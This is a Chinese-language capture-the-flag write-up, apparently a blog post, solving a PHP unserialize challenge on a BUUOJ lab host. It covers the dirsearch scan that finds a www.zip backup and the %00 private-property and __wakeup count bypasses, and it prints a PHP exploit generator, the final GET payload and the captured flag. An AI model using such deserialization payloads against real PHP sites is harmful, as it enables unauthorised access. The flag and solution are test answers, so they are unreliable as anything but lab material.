题目环境:
注意这四个字“备份网站”,让我想到了之前自己做网站的时候,有一次上传FTP网站文件,不小心把全部网站文件清空了,我伤心欲绝没有做网站备份文件,自此以后我就把网站文件在本地备份了一份,每更新网站有一次就在本地备份一次,备份格式是ZIP格式,比较节省空间,所以我这猜测它网站后台必定又一个网站备份ZIP文件
使用dirsearch工具扫描网站后台(这个工具是我最喜欢的,扫描的比较全面,大部分都可以扫描到,博主有压缩文件可以私聊我进行领取!)python dirsearch.py -u http://a02fc32b-1091-4b95-a4a1-27fb1bc51ba1.node4.buuoj.cn:81/
回车
大概需要好几分钟(需耐心等待)<br>扫描出www.zip压缩文件
下载www.zip文件
回车进行下载
假的flag文件
查看index.php文件
发现参数select(通过GET方式进行传参) unserialize反序列化
查看class.php文件
一道反序列化题目(相对简单的反序列化题目)
private私有变量,对象和变量名前需要用%00进行绕过 wakeup魔法函数,只需要大于实际变量数即可绕过,比如本题中有两个变量username和password,所以序列化就是O:4:"Name":2:,O对象名,4就是Name是4个字符,2就是Name对象里面有两个变量,大于实际变量数即可绕过O:4:"Name":3: var_dump函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。
想要于万军之中取flag首级(只须满足两个条件)
1、满足password=100 2、满足username='admin'
1、满足password=100 2、满足username='admin'构造exp(取关键代码进行构造)
<?php
class Name
{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username, $password)
{
$this->username = $username;
$this->password = $password;
}
}
$flag=new Name('admin',100);
var_dump(serialize($flag));
?>
payload:
O:4:"Name":2:{s:14:"\000Name\000username";s:5:"admin";s:14:"\000Name\000password";i:100;} 绕过private和wakeup O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
最终payload: ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
上传payload:
得到flag:flag{5750f1c4-ad75-42cf-9bd2-79e668cfc3a4}